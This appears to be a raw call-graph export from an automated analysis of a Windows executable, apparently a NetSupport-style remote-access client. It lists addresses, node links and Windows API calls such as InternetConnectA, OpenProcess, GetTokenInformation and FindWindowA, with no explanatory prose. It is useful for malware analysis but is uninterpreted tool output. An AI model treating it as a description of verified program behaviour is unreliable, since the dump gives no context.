GetProcAddress 101967->101973 101969 11029372 GetLastError 101969->101973 101970 1113e8f0 std::locale::_Init 261 API calls 101970->101973 101971 1115f3b5 23 API calls _free 101971->101973 101972 11029395 GetProcAddress 101972->101973 101973->101962 101973->101964 101973->101965 101973->101967 101973->101969 101973->101970 101973->101971 101973->101972 101978 110296ba std::ios_base::_Tidy 101973->101978 101981 11080b10 IsDBCSLeadByte 101973->101981 101988 1102949f GetProcAddress 101973->101988 101989 110294cb GetProcAddress 101973->101989 101990 110294de InternetConnectA 101973->101990 101996 11029543 GetProcAddress 101973->101996 101997 11029504 GetProcAddress 101973->101997 102003 11029591 GetProcAddress 101973->102003 102005 110295c2 GetLastError 101973->102005 102008 11029615 GetLastError 101973->102008 102009 1102962c GetDesktopWindow 101973->102009 101981->101973 101988->101973 101989->101990 101990->101973 101996->101973 101997->101973 102003->101973 102005->101973 102008->101973 102008->102009 102009->101973 102012->101843 102013->101866 102023->101842 102024->101846 102030 110cf1bc 102029->102030 102031 110cf1d7 102030->102031 102032 110cf1c0 102030->102032 102045 110cdeb0 102031->102045 102074 110290f0 261 API calls 2 library calls 102032->102074 102039 110cf20e 102039->101942 102039->101943 102040 110cf1f7 102075 110290f0 261 API calls 2 library calls 102040->102075 102046 110cdeb9 102045->102046 102047 110cdebd 102046->102047 102048 110cded4 102046->102048 102076 110290f0 261 API calls 2 library calls 102047->102076 102050 110cded1 102048->102050 102051 110cdf08 102048->102051 102050->102048 102077 110290f0 261 API calls 2 library calls 102050->102077 102053 110cdf05 102051->102053 102054 110cdf26 102051->102054 102053->102051 102078 110290f0 261 API calls 2 library calls 102053->102078 102057 110cedc0 102054->102057 102058 110cedce 102057->102058 102059 110cede9 102058->102059 102060 110cedd2 102058->102060 102062 110cede6 102059->102062 102064 110cee1c 102059->102064 102079 110290f0 261 API calls 2 library calls 102060->102079 102062->102059 102080 110290f0 261 API calls 2 library calls 102062->102080 102063 110cee90 102063->102039 102063->102040 102064->102063 102064->102064 102081 110ce710 102064->102081 102068 110cee4f _memmove 102068->102063 102071 110cee79 102068->102071 102082 110ce71d 102081->102082 102083 110ce738 102082->102083 102084 110ce721 102082->102084 102086 110ce756 102083->102086 102087 110ce735 102083->102087 102099 110290f0 261 API calls 2 library calls 102084->102099 102094 110ce180 102086->102094 102087->102083 102100 110290f0 261 API calls 2 library calls 102087->102100 102092 110ce650 264 API calls 2 library calls 102092->102068 102095 110ce18b 102094->102095 102096 110ce1a2 102094->102096 102101 110290f0 261 API calls 2 library calls 102095->102101 102096->102068 102096->102092 102127 1110c420 std::locale::_Init 261 API calls 102126->102127 102128 110ffe0d 102127->102128 102129 110ffe40 102128->102129 102134 110ffcc0 102128->102134 102129->101882 102131 110ffe2d 102131->101882 102132->101886 102133->101888 102141 1115bd20 102134->102141 102137 110ffd27 std::locale::_Init 102139 110ffd60 GetStockObject RegisterClassA 102137->102139 102138 110ffd91 CreateWindowExA 102138->102131 102139->102138 102140 110ffd8a 102139->102140 102140->102138 102144 1115ab80 GlobalAddAtomA 102141->102144 102145 1115abb5 GetLastError wsprintfA 102144->102145 102146 1115ac07 GlobalAddAtomA GlobalAddAtomA 102144->102146 102153 110290f0 261 API calls 2 library calls 102145->102153 102148 1115e4d1 __setlocale_nolock 5 API calls 102146->102148 102149 110ffcf1 GlobalAddAtomA 102148->102149 102149->102137 102149->102138 102155 1109dcd6 102154->102155 102156 1109dc40 GetTokenInformation 102154->102156 102158 1115e4d1 __setlocale_nolock 5 API calls 102155->102158 102157 1109dc62 __crtGetStringTypeA_stat 102156->102157 102157->102155 102160 1109dc68 GetTokenInformation 102157->102160 102159 1109dce8 102158->102159 102159->101744 102160->102155 102161 1109dc7a 102160->102161 102162 1109dcaf EqualSid 102161->102162 102163 1109dc83 AllocateAndInitializeSid 102161->102163 102162->102155 102164 1109dcbd 102162->102164 102163->102155 102163->102162 102165 1115e4d1 __setlocale_nolock 5 API calls 102164->102165 102166 1109dcd2 102165->102166 102166->101744 102168 1116021d 102167->102168 102169 1116020b 102167->102169 102182 111601ac 75 API calls 2 library calls 102168->102182 102169->101772 102171 11160227 102171->101772 102173 11080d0d 102172->102173 102174 11080d12 102172->102174 102183 11080a30 IsDBCSLeadByte 102173->102183 102176 11080d1b 102174->102176 102180 11080d33 102174->102180 102184 1115ff54 81 API calls 3 library calls 102176->102184 102178 11080d2c 102178->101761 102179 11161f66 81 API calls std::locale::_Init 102179->102180 102180->102179 102181 11080d39 102180->102181 102181->101761 102182->102171 102183->102174 102184->102178 102185->101618 102186->101612 102187->101625 102188->101629 102189->101628 102190->101629 102192 111610dd 102191->102192 102194 111610f6 102191->102194 102192->102194 102224 1116c9b8 8 API calls 102192->102224 102195 11161d95 102194->102195 102225 1116fe36 LeaveCriticalSection 102195->102225 102197 11161ce2 102198 11161a47 102197->102198 102199 11161a70 102198->102199 102205 11161a8b 102198->102205 102216->101638 102217->101643 102224->102194 102225->102197 102353 1113f146 102352->102353 102354 1113f203 102353->102354 102355 11080b10 IsDBCSLeadByte 102353->102355 102354->101667 102356 1113f16b 102355->102356 102357 11080b10 IsDBCSLeadByte 102356->102357 102358 1113f19b _memmove 102357->102358 102358->101667 102372 68b41dfc 102373 68b41e16 102372->102373 102374 68b41e0b 102372->102374 102377 68b4c84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 102373->102377 102374->102373 102376 68b4c845 102377->102376 102378 11112b00 102396 11141990 102378->102396 102381 11112b45 102382 11112b28 102381->102382 102383 11112b54 CoInitialize CoCreateInstance 102381->102383 102384 1115e4d1 __setlocale_nolock 5 API calls 102382->102384 102386 11112b84 LoadLibraryA 102383->102386 102387 11112b79 102383->102387 102388 11112b36 102384->102388 102385 11141710 std::locale::_Init 86 API calls 102385->102381 102386->102387 102389 11112ba0 GetProcAddress 102386->102389 102392 11112c61 CoUninitialize 102387->102392 102393 11112c67 102387->102393 102390 11112bb0 SHGetSettings 102389->102390 102391 11112bc4 FreeLibrary 102389->102391 102390->102391 102391->102387 102392->102393 102394 1115e4d1 __setlocale_nolock 5 API calls 102393->102394 102395 11112c76 102394->102395 102397 11141710 std::locale::_Init 86 API calls 102396->102397 102398 11112b1e 102397->102398 102398->102381 102398->102382 102398->102385 102399 11017610 GetTickCount 102406 11017520 102399->102406 102404 11142a60 std::locale::_Init 21 API calls 102405 11017657 102404->102405 102407 11017540 102406->102407 102408 110175f6 102406->102408 102409 11017562 CoInitialize 102407->102409 102411 11017559 WaitForSingleObject 102407->102411 102410 1115e4d1 __setlocale_nolock 5 API calls 102408->102410 102434 111585e0 102409->102434 102413 11017605 102410->102413 102411->102409 102420 11017440 102413->102420 102414 110175e2 102414->102408 102415 110175f0 CoUninitialize 102414->102415 102415->102408 102416 110175dc 102446 11160007 35 API calls __fassign 102416->102446 102418 11017591 102418->102414 102418->102416 102419 111601fd std::locale::_Init 75 API calls 102418->102419 102419->102418 102421 11017460 102420->102421 102422 11017506 102420->102422 102424 11017478 CoInitialize 102421->102424 102427 1101746f WaitForSingleObject 102421->102427 102423 1115e4d1 __setlocale_nolock 5 API calls 102422->102423 102426 11017515 SetEvent GetTickCount 102423->102426 102425 111585e0 271 API calls 102424->102425 102430 110174a7 102425->102430 102426->102404 102427->102424 102428 11017500 CoUninitialize 102428->102422 102429 110174ec 102480 11160007 35 API calls __fassign 102429->102480 102430->102429 102432 111601fd std::locale::_Init 75 API calls 102430->102432 102433 110174f2 102430->102433 102432->102430 102433->102422 102433->102428 102435 111585f4 102434->102435 102436 111585ec 102434->102436 102447 1115f97b 102435->102447 102436->102418 102439 11158614 102439->102418 102440 11158740 102442 1115f3b5 _free 23 API calls 102440->102442 102443 11158768 102442->102443 102443->102418 102444 11158631 102444->102440 102445 11158724 SetLastError 102444->102445 102445->102444 102446->102414 102448 1116c936 __calloc_crt 23 API calls 102447->102448 102449 1115f995 102448->102449 102450 11158608 102449->102450 102471 11165abf 23 API calls __getptd_noexit 102449->102471 102450->102439 102450->102440 102454 11158220 CoInitializeSecurity CoCreateInstance 102450->102454 102452 1115f9a8 102452->102450 102472 11165abf 23 API calls __getptd_noexit 102452->102472 102455 11158295 wsprintfW SysAllocString 102454->102455 102456 11158414 102454->102456 102460 111582db 102455->102460 102457 1115e4d1 __setlocale_nolock 5 API calls 102456->102457 102459 11158440 102457->102459 102458 11158401 SysFreeString 102458->102456 102459->102444 102460->102458 102460->102460 102461 1115836c 102460->102461 102462 1115835a wsprintfW 102460->102462 102470 111583e9 102460->102470 102473 110967f0 102461->102473 102462->102461 102464 1115837e 102465 110967f0 262 API calls 102464->102465 102466 11158393 102465->102466 102478 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 102466->102478 102468 111583d7 102479 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 102468->102479 102470->102458 102471->102452 102472->102450 102474 1110c420 std::locale::_Init 261 API calls 102473->102474 102475 11096823 102474->102475 102476 11096836 SysAllocString 102475->102476 102477 11096854 102475->102477 102476->102477 102477->102464 102478->102468 102479->102470 102480->102433 102481 11025850 102482 1102585a 102481->102482 102484 11025860 102481->102484 102483 11160535 std::locale::_Init 98 API calls 102482->102483 102483->102484 102485 11132080 102486 11132089 102485->102486 102492 111320b8 102485->102492 102487 11141990 std::locale::_Init 86 API calls 102486->102487 102488 1113208e 102487->102488 102488->102492 102493 1112fc80 102488->102493 102490 11132097 102491 1105d340 75 API calls 102490->102491 102490->102492 102491->102492 102494 1112fca1 std::locale::_Init 102493->102494 102516 1112fdc1 102493->102516 102497 1112fcb6 102494->102497 102498 1112fccd 102494->102498 102495 1115e4d1 __setlocale_nolock 5 API calls 102496 1112fdd5 102495->102496 102496->102490 102499 1115e4d1 __setlocale_nolock 5 API calls 102497->102499 102500 11141240 std::locale::_Init 261 API calls 102498->102500 102502 1112fcc9 102499->102502 102501 1112fcda wsprintfA 102500->102501 102521 1113f8a0 102501->102521 102502->102490 102504 1112fd00 102505 1112fd07 102504->102505 102506 1112fd78 102504->102506 102532 110b6bd0 102505->102532 102508 11141240 std::locale::_Init 261 API calls 102506->102508 102509 1112fd84 wsprintfA 102508->102509 102511 1113f8a0 std::locale::_Init 8 API calls 102509->102511 102510 1112fd12 102512 1112fda4 102510->102512 102513 1112fd1a GetTickCount SHGetFolderPathA GetTickCount 102510->102513 102511->102512 102514 11142a60 std::locale::_Init 21 API calls 102512->102514 102515 1112fd45 102513->102515 102518 1112fd50 102513->102518 102514->102516 102517 11142a60 std::locale::_Init 21 API calls 102515->102517 102516->102495 102517->102518 102518->102512 102547 110eb6b0 9 API calls 102518->102547 102520 1112fd73 102520->102512 102522 1113f8c1 CreateFileA 102521->102522 102524 1113f95e CloseHandle 102522->102524 102525 1113f93e 102522->102525 102528 1115e4d1 __setlocale_nolock 5 API calls 102524->102528 102526 1113f942 CreateFileA 102525->102526 102527 1113f97b 102525->102527 102526->102524 102526->102527 102530 1115e4d1 __setlocale_nolock 5 API calls 102527->102530 102529 1113f977 102528->102529 102529->102504 102531 1113f98a 102530->102531 102531->102504 102533 110b6be3 GetModuleHandleA GetProcAddress 102532->102533 102534 110b6ca4 102532->102534 102535 110b6c2a GetCurrentProcessId OpenProcess 102533->102535 102536 110b6c0f GetCurrentProcessId 102533->102536 102534->102510 102537 110b6c77 102535->102537 102538 110b6c47 OpenProcessToken 102535->102538 102539 110b6c18 102536->102539 102543 110b6c93 CloseHandle 102537->102543 102544 110b6c96 102537->102544 102538->102537 102540 110b6c58 102538->102540 102539->102535 102541 110b6c1c 102539->102541 102540->102537 102542 110b6c5f GetTokenInformation 102540->102542 102541->102510 102542->102537 102543->102544 102545 110b6c9a CloseHandle 102544->102545 102546 110b6c9d 102544->102546 102545->102546 102546->102534 102547->102520 102548 11030b10 102549 11030b1e 102548->102549 102553 11142490 102549->102553 102552 11030b3f std::locale::_Init std::ios_base::_Tidy 102556 11141680 102553->102556 102557 11141690 102556->102557 102557->102557 102558 1110c4a0 std::locale::_Init 261 API calls 102557->102558 102559 111416a2 102558->102559 102562 111415b0 102559->102562 102561 11030b2f SetUnhandledExceptionFilter 102561->102552 102563 11141602 __crtGetStringTypeA_stat 102562->102563 102564 111415c7 _strncpy 102562->102564 102573 1113ed90 MultiByteToWideChar 102563->102573 102564->102564 102566 1115e4d1 __setlocale_nolock 5 API calls 102564->102566 102567 111415fe 102566->102567 102567->102561 102568 11141634 102574 1113edd0 WideCharToMultiByte GetLastError 102568->102574 102570 11141646 102571 1115e4d1 __setlocale_nolock 5 API calls 102570->102571 102572 11141659 102571->102572 102572->102561 102573->102568 102574->102570 102575 11137300 102576 1113730c 102575->102576 102577 111373da 102576->102577 102578 111373c8 102576->102578 102581 11137368 102576->102581 102578->102577 102579 11136060 374 API calls 102578->102579 102579->102577 102580 111373a0 102585 11136060 102580->102585 102581->102577 102581->102580 102583 1105d340 75 API calls 102581->102583 102583->102580 102584 111373b1 102586 1113649f 102585->102586 102589 1113607d 102585->102589 102587 1115e4d1 __setlocale_nolock 5 API calls 102586->102587 102588 111364ae 102587->102588 102588->102584 102589->102586 102590 11141710 std::locale::_Init 86 API calls 102589->102590 102591 111360bc 102590->102591 102591->102586 102592 1105d340 75 API calls 102591->102592 102593 111360eb 102592->102593 102665 111299f0 102593->102665 102595 11136230 PostMessageA 102597 11136245 102595->102597 102596 1105d340 75 API calls 102598 1113622c 102596->102598 102599 11136255 102597->102599 102679 1110c270 InterlockedDecrement 102597->102679 102598->102595 102598->102597 102600 1113625b 102599->102600 102601 1113627d 102599->102601 102605 111362b3 std::ios_base::_Tidy 102600->102605 102606 111362ce 102600->102606 102680 1112d530 297 API calls std::locale::_Init 102601->102680 102604 11136285 102681 111434d0 263 API calls 102604->102681 102612 1115e4d1 __setlocale_nolock 5 API calls 102605->102612 102683 1113f4f0 102606->102683 102610 111362d3 102688 111434f0 102610->102688 102611 1113628f 102682 11129bf0 SetDlgItemTextA 102611->102682 102615 111362ca 102612->102615 102615->102584 102617 111362a0 std::ios_base::_Tidy 102617->102600 102621 111361db 102621->102595 102621->102596 102666 11129a0c 102665->102666 102667 11129a47 102666->102667 102668 11129a34 102666->102668 102702 1106ae60 294 API calls 102667->102702 102670 111434f0 265 API calls 102668->102670 102671 11129a3f 102670->102671 102672 11129a93 102671->102672 102673 1113e8f0 std::locale::_Init 261 API calls 102671->102673 102672->102621 102674 11142150 102672->102674 102673->102672 102675 1110c650 4 API calls 102674->102675 102676 1114215f 102675->102676 102703 11141100 102676->102703 102679->102599 102680->102604 102681->102611 102682->102617 102684 1113f4f9 102683->102684 102685 1113f4ff 102683->102685 102684->102610 102686 1102a250 std::locale::_Init 141 API calls 102685->102686 102687 1113f516 102686->102687 102687->102610 102718 111433b0 102688->102718 102702->102671 102714 110952d0 102703->102714 102706 11141124 wsprintfA 102707 11141137 102706->102707 102708 1114113b 102707->102708 102711 11141152 102707->102711 102716 110290f0 261 API calls 2 library calls 102708->102716 102710 11141163 102710->102621 102711->102710 102717 11140d70 5 API calls __setlocale_nolock 102711->102717 102715 110952d9 LoadStringA 102714->102715 102715->102706 102715->102707 102717->102710 102719 110952d0 102718->102719 102720 111433de LoadStringA 102719->102720 102721 11143402 102720->102721 102722 111433f0 102720->102722 102724 1114341e 102721->102724 102725 11143409 wsprintfA 102721->102725 102747 11140d70 5 API calls __setlocale_nolock 102722->102747 102726 1114343a 102724->102726 102727 11143426 102724->102727 102725->102726 102733 11143250 102726->102733 102748 110290f0 261 API calls 2 library calls 102727->102748 102731 1115e4d1 __setlocale_nolock 5 API calls 102732 111362da SetWindowTextA 102731->102732 102734 11080b10 IsDBCSLeadByte 102733->102734 102735 111432a0 102734->102735 102736 111432e3 wvsprintfA 102735->102736 102737 111601fd std::locale::_Init 75 API calls 102735->102737 102738 111432f8 102736->102738 102739 111432b3 102737->102739 102740 11143314 102738->102740 102741 11142a60 std::locale::_Init 21 API calls 102738->102741 102739->102736 102743 111432c0 FormatMessageA 102739->102743 102742 1113e8f0 std::locale::_Init 261 API calls 102740->102742 102741->102740 102744 11143324 102742->102744 102743->102738 102745 1115e4d1 __setlocale_nolock 5 API calls 102744->102745 102746 111433a6 102745->102746 102746->102731 102747->102721 102749 11088b50 102750 1110c650 4 API calls 102749->102750 102751 11088b63 102750->102751 102752 11088b6d 102751->102752 102761 11088290 264 API calls std::locale::_Init 102751->102761 102754 11088b94 102752->102754 102762 11088290 264 API calls std::locale::_Init 102752->102762 102757 11088ba3 102754->102757 102758 11088b20 102754->102758 102763 110887b0 102758->102763 102761->102752 102762->102754 102804 11087ab0 6 API calls 102763->102804 102765 110887e9 GetParent 102766 110887fc 102765->102766 102767 1108880d 102765->102767 102768 11088800 GetParent 102766->102768 102769 11141430 263 API calls 102767->102769 102768->102767 102768->102768 102770 11088819 102769->102770 102771 1116076b std::locale::_Init 139 API calls 102770->102771 102772 11088826 std::ios_base::_Tidy 102771->102772 102773 11141430 263 API calls 102772->102773 102774 1108883f 102773->102774 102805 110139e0 22 API calls 2 library calls 102774->102805 102776 1108885a 102777 1113f8a0 std::locale::_Init 8 API calls 102776->102777 102778 1108889a std::ios_base::_Tidy 102777->102778 102779 110888b5 102778->102779 102781 1113e8f0 std::locale::_Init 261 API calls 102778->102781 102780 11160535 std::locale::_Init 98 API calls 102779->102780 102782 110888d3 std::locale::_Init 102779->102782 102780->102782 102781->102779 102784 1102a250 std::locale::_Init 141 API calls 102782->102784 102793 11088984 std::ios_base::_Tidy 102782->102793 102783 1115e4d1 __setlocale_nolock 5 API calls 102785 11088a72 102783->102785 102786 11088923 102784->102786 102785->102757 102787 1113e8f0 std::locale::_Init 261 API calls 102786->102787 102788 1108892b 102787->102788 102789 11080be0 std::locale::_Init IsDBCSLeadByte 102788->102789 102790 11088942 102789->102790 102791 11080c50 82 API calls 102790->102791 102790->102793 102792 1108895a 102791->102792 102794 1108899e 102792->102794 102795 11088961 102792->102795 102793->102783 102796 11080c50 82 API calls 102794->102796 102806 110b6880 102795->102806 102799 110889a9 102796->102799 102799->102793 102801 110b6880 36 API calls 102799->102801 102800 110b6880 36 API calls 102800->102793 102802 110889b6 102801->102802 102802->102793 102803 110b6880 36 API calls 102802->102803 102803->102793 102804->102765 102805->102776 102809 110b6860 102806->102809 102812 11163ab3 102809->102812 102815 11163a34 102812->102815 102816 11163a41 102815->102816 102817 11163a5b 102815->102817 102833 11165ad2 23 API calls __getptd_noexit 102816->102833 102817->102816 102819 11163a64 GetFileAttributesA 102817->102819 102821 11163a72 GetLastError 102819->102821 102825 11163a88 102819->102825 102820 11163a46 102834 11165abf 23 API calls __getptd_noexit 102820->102834 102836 11165ae5 23 API calls 2 library calls 102821->102836 102824 11163a4d 102835 1116a6d4 11 API calls _fputs 102824->102835 102828 11088967 102825->102828 102838 11165ad2 23 API calls __getptd_noexit 102825->102838 102828->102793 102828->102800 102830 11163a9b 102839 11165abf 23 API calls __getptd_noexit 102830->102839 102832 11163a7e 102837 11165abf 23 API calls __getptd_noexit 102832->102837 102833->102820 102834->102824 102835->102828 102836->102832 102837->102828 102838->102830 102839->102832 102840 1102e15e 102841 11080c50 82 API calls 102840->102841 102842 1102e171 102841->102842 102843 1113f220 82 API calls 102842->102843 102844 1102e19a 102843->102844 102845 1115f5b7 std::locale::_Init 75 API calls 102844->102845 102849 1102e1a7 102844->102849 102845->102849 102846 1102e1d6 102847 1102e248 102846->102847 102848 1102e22f GetSystemMetrics 102846->102848 102851 1102e262 CreateEventA 102847->102851 102848->102847 102850 1102e23e 102848->102850 102849->102846 102852 11141710 std::locale::_Init 86 API calls 102849->102852 102853 11142a60 std::locale::_Init 21 API calls 102850->102853 102854 1102e275 102851->102854 102855 1102e289 102851->102855 102852->102846 102853->102847 103748 110290f0 261 API calls 2 library calls 102854->103748 102857 1110c420 std::locale::_Init 261 API calls 102855->102857 102858 1102e290 102857->102858 102859 1110d060 420 API calls 102858->102859 102860 1102e2b0 102859->102860 102861 1110c420 std::locale::_Init 261 API calls 102860->102861 102862 1102e2c4 102861->102862 102863 1110d060 420 API calls 102862->102863 102864 1102e2e4 102863->102864 102865 1110c420 std::locale::_Init 261 API calls 102864->102865 102866 1102e363 102865->102866 102867 11060520 261 API calls 102866->102867 102868 1102e393 102867->102868 102869 1110c420 std::locale::_Init 261 API calls 102868->102869 102870 1102e3ad 102869->102870 102871 1102e3d6 FindWindowA 102870->102871 102872 1102e527 102871->102872 102873 1102e40b 102871->102873 103203 11060970 102872->103203 102873->102872 102876 1102e423 GetWindowThreadProcessId 102873->102876 102879 11142a60 std::locale::_Init 21 API calls 102876->102879 102877 11060970 264 API calls 102878 1102e545 102877->102878 102880 11060970 264 API calls 102878->102880 102881 1102e449 OpenProcess 102879->102881 102882 1102e551 102880->102882 102881->102872 102883 1102e469 102881->102883 102884 1102e568 102882->102884 102885 1102e55f 102882->102885 102889 11142a60 std::locale::_Init 21 API calls 102883->102889 103210 11141f80 102884->103210 103749 110279d0 115 API calls 2 library calls 102885->103749 102887 1102e564 102887->102884 102890 1102e49c 102889->102890 102892 1102e4db CloseHandle FindWindowA 102890->102892 102893 11142a60 std::locale::_Init 21 API calls 102890->102893 102894 1102e503 GetWindowThreadProcessId 102892->102894 102895 1102e517 102892->102895 102897 1102e4ae SendMessageA WaitForSingleObject 102893->102897 102894->102895 102898 11142a60 std::locale::_Init 21 API calls 102895->102898 102897->102892 102900 1102e4ce 102897->102900 102901 1102e524 102898->102901 102903 11142a60 std::locale::_Init 21 API calls 102900->102903 102901->102872 102904 1102e4d8 102903->102904 102904->102892 103204 110609e6 103203->103204 103205 11060997 103203->103205 103206 1115e4d1 __setlocale_nolock 5 API calls 103204->103206 103205->103204 103208 11080c50 82 API calls 103205->103208 103771 11060890 264 API calls 4 library calls 103205->103771 103207 1102e539 103206->103207 103207->102877 103208->103205 103211 11141240 std::locale::_Init 261 API calls 103210->103211 103212 11141f9b wsprintfA 103211->103212 103213 11141240 std::locale::_Init 261 API calls 103212->103213 103214 11141fb7 wsprintfA 103213->103214 103215 1113f8a0 std::locale::_Init 8 API calls 103214->103215 103216 11141fd4 103215->103216 103217 11142000 103216->103217 103218 1113f8a0 std::locale::_Init 8 API calls 103216->103218 103219 1115e4d1 __setlocale_nolock 5 API calls 103217->103219 103220 11141fe9 103218->103220 103220->103217 103749->102887 103771->103205 105340 110400d8 105350 110f8740 GetTokenInformation 105340->105350 105342 110400ea CloseHandle 105343 11040101 105342->105343 105344 110f8740 15 API calls 105343->105344 105345 1104019a 105344->105345 105346 110401a2 CloseHandle 105345->105346 105347 110401a9 105345->105347 105346->105347 105348 1115e4d1 __setlocale_nolock 5 API calls 105347->105348 105349 110401e7 105348->105349 105351 110f8788 105350->105351 105352 110f8777 105350->105352 105360 110efc70 9 API calls 105351->105360 105353 1115e4d1 __setlocale_nolock 5 API calls 105352->105353 105355 110f8784 105353->105355 105355->105342 105356 110f87ac 105356->105352 105357 110f87b4 105356->105357 105357->105357 105358 1115e4d1 __setlocale_nolock 5 API calls 105357->105358 105359 110f87da 105358->105359 105359->105342 105360->105356 105361 110618d9 105362 110618e4 105361->105362 105363 11080c50 82 API calls 105362->105363 105364 11061901 105363->105364 105365 1106197a 105364->105365 105366 11061908 GetTickCount CheckLicenseString wsprintfA 105364->105366 105367 1105d430 270 API calls 105365->105367 105368 11061950 std::locale::_Init 105366->105368 105371 110615b0 _strpbrk 105367->105371 105368->105365 105369 11061b42 ExitProcess 105368->105369 105372 11160c1d 105371->105372 105373 11160c29 _fputs 105372->105373 105374 11160c3c 105373->105374 105375 11160c6d 105373->105375 105409 11165abf 23 API calls __getptd_noexit 105374->105409 105379 11167769 __lock_file EnterCriticalSection 105375->105379 105381 11160c4c _fputs 105375->105381 105377 11160c41 105410 1116a6d4 11 API calls _fputs 105377->105410 105380 11160c7b 105379->105380 105382 11165a57 _fputs 34 API calls 105380->105382 105385 11160cf1 105380->105385 105381->105371 105387 11160c8c 105382->105387 105383 11160d1e 105413 11160d4d LeaveCriticalSection LeaveCriticalSection _fseek 105383->105413 105385->105383 105391 1116e1f5 105385->105391 105387->105385 105411 11165abf 23 API calls __getptd_noexit 105387->105411 105389 11160ce6 105412 1116a6d4 11 API calls _fputs 105389->105412 105392 1116e202 105391->105392 105397 1116e217 __getbuf 105391->105397 105444 11165abf 23 API calls __getptd_noexit 105392->105444 105394 1116e212 105394->105385 105395 1116e207 105445 1116a6d4 11 API calls _fputs 105395->105445 105397->105394 105398 11165a57 _fputs 34 API calls 105397->105398 105399 1116e260 105398->105399 105414 11170fc0 105399->105414 105401 1116e267 105401->105394 105402 11165a57 _fputs 34 API calls 105401->105402 105403 1116e28a 105402->105403 105403->105394 105404 11165a57 _fputs 34 API calls 105403->105404 105405 1116e296 105404->105405 105405->105394 105406 11165a57 _fputs 34 API calls 105405->105406 105407 1116e2a3 105406->105407 105408 11165a57 _fputs 34 API calls 105407->105408 105408->105394 105409->105377 105410->105381 105411->105389 105412->105385 105413->105381 105415 11170fcc _fputs 105414->105415 105416 11170fd4 105415->105416 105417 11170fef 105415->105417 105446 11165ad2 23 API calls __getptd_noexit 105416->105446 105418 11170ffb 105417->105418 105423 11171035 105417->105423 105448 11165ad2 23 API calls __getptd_noexit 105418->105448 105421 11170fd9 105447 11165abf 23 API calls __getptd_noexit 105421->105447 105422 11171000 105449 11165abf 23 API calls __getptd_noexit 105422->105449 105427 11171057 105423->105427 105428 11171042 105423->105428 105425 11170fe1 _fputs 105425->105401 105429 111731d2 ___lock_fhandle 3 API calls 105427->105429 105451 11165ad2 23 API calls __getptd_noexit 105428->105451 105433 1117105d 105429->105433 105430 11171008 105450 1116a6d4 11 API calls _fputs 105430->105450 105432 11171047 105452 11165abf 23 API calls __getptd_noexit 105432->105452 105435 1117107f 105433->105435 105436 1117106b 105433->105436 105453 11165abf 23 API calls __getptd_noexit 105435->105453 105438 11170a09 __read_nolock 44 API calls 105436->105438 105441 11171077 105438->105441 105440 11171084 105454 11165ad2 23 API calls __getptd_noexit 105440->105454 105455 111710ae LeaveCriticalSection __unlock_fhandle 105441->105455 105444->105395 105445->105394 105446->105421 105447->105425 105448->105422 105449->105430 105450->105425 105451->105432 105452->105430 105453->105440 105454->105441 105455->105425 105456 11170208 105457 11167f85 __getptd 62 API calls 105456->105457 105458 11170225 _LcidFromHexString 105457->105458 105459 11170232 GetLocaleInfoA 105458->105459 105460 11170265 105459->105460 105478 11170259 105459->105478 105479 11160e4e 81 API calls 3 library calls 105460->105479 105462 1115e4d1 __setlocale_nolock 5 API calls 105464 111703d5 105462->105464 105463 11170271 105465 1117027b GetLocaleInfoA 105463->105465 105475 111702ab _LangCountryEnumProc@4 _strlen 105463->105475 105466 1117029a 105465->105466 105465->105478 105480 11160e4e 81 API calls 3 library calls 105466->105480 105467 1117031e GetLocaleInfoA 105468 11170341 105467->105468 105467->105478 105482 11160e4e 81 API calls 3 library calls 105468->105482 105471 111702a5 105471->105475 105481 1115ff54 81 API calls 3 library calls 105471->105481 105473 1117034c 105476 11170354 _strlen 105473->105476 105473->105478 105483 11160e4e 81 API calls 3 library calls 105473->105483 105475->105467 105475->105478 105476->105478 105484 111701ad GetLocaleInfoW _GetPrimaryLen _strlen 105476->105484 105478->105462 105479->105463 105480->105471 105481->105475 105482->105473 105483->105476 105484->105478 105485 401020 GetCommandLineA 105486 401032 GetStartupInfoA 105485->105486 105488 401086 GetModuleHandleA 105486->105488 105492 401000 _NSMClient32 105488->105492 105491 4010a8 ExitProcess 105492->105491 105493 110259a0 LoadLibraryA 105494 110259e0 105495 110259ee GetProcAddress 105494->105495 105496 110259ff 105494->105496 105495->105496 105497 11025a18 105496->105497 105498 11025a0c K32GetProcessImageFileNameA 105496->105498 105500 11025a1e GetProcAddress 105497->105500 105501 11025a2f 105497->105501 105498->105497 105499 11025a51 105498->105499 105500->105501 105502 11025a36 105501->105502 105503 11025a47 SetLastError 105501->105503 105503->105499 105504 11140870 105505 11140881 105504->105505 105518 11140290 105505->105518 105509 11140905 105511 11140922 105509->105511 105513 11140904 105509->105513 105510 111408cb 105512 111408d2 ResetEvent 105510->105512 105526 11140450 261 API calls 2 library calls 105512->105526 105513->105509 105527 11140450 261 API calls 2 library calls 105513->105527 105515 111408e6 SetEvent WaitForMultipleObjects 105515->105512 105515->105513 105517 1114091f 105517->105511 105519 1114029c GetCurrentProcess 105518->105519 105520 111402bf 105518->105520 105519->105520 105521 111402ad GetModuleFileNameA 105519->105521 105522 111402e9 WaitForMultipleObjects 105520->105522 105523 1110c420 std::locale::_Init 259 API calls 105520->105523 105521->105520 105522->105509 105522->105510 105524 111402db 105523->105524 105524->105522 105528 1113fbe0 GetModuleFileNameA 105524->105528 105526->105515 105527->105517 105529 1113fc63 105528->105529 105530 1113fc23 105528->105530 105533 1113fc89 GetModuleHandleA GetProcAddress 105529->105533 105534 1113fc6f LoadLibraryA 105529->105534 105531 11080be0 std::locale::_Init IsDBCSLeadByte 105530->105531 105532 1113fc31 105531->105532 105532->105529 105535 1113fc38 LoadLibraryA 105532->105535 105537 1113fcb7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105533->105537 105538 1113fca9 105533->105538 105534->105533 105536 1113fc7e LoadLibraryA 105534->105536 105535->105529 105536->105533 105539 1113fce3 10 API calls 105537->105539 105538->105539 105540 1115e4d1 __setlocale_nolock 5 API calls 105539->105540 105541 1113fd60 105540->105541 105541->105522 105542 110302a9 105543 1113f670 std::locale::_Init RegQueryValueExA 105542->105543 105544 110302d1 105543->105544 105545 110303bc RegCloseKey 105544->105545 105547 1115f5b7 std::locale::_Init 75 API calls 105544->105547 105546 110303e6 105545->105546 105548 110303ed 105546->105548 105550 110304d1 105546->105550 105549 110302e5 105547->105549 105552 1110c420 std::locale::_Init 